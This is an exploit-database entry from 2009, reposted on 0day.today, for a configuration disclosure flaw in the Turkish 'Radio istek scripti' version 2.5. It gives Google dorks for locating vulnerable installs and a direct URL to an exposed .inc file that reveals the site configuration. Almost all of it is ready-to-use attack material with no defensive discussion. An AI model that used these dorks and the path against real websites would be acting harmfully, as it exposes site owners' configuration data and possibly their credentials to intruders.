id: 10028
date: 11/25/2009
title: Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability
author: kurdish
cves: 

=====================================================================
Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability
=====================================================================

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
 
<<->> script :: RADIO istek scripti (tr) Version 2.5 (tr)
 
<<->> download script ::
 http://www.scriptlerim.net/download/radio-istek-scripti-tr-.html
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Dork:"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5"
<<->> 0r
<<->> Dork:"estafresgaftesantusyan.inc"
 
 
<<->> Exploit ::
 
>>> http://server/path/estafresgaftesantusyan.inc
 
Now can see all information Config ...
 
=======================================================


#  0day.today [2023-03-25]  #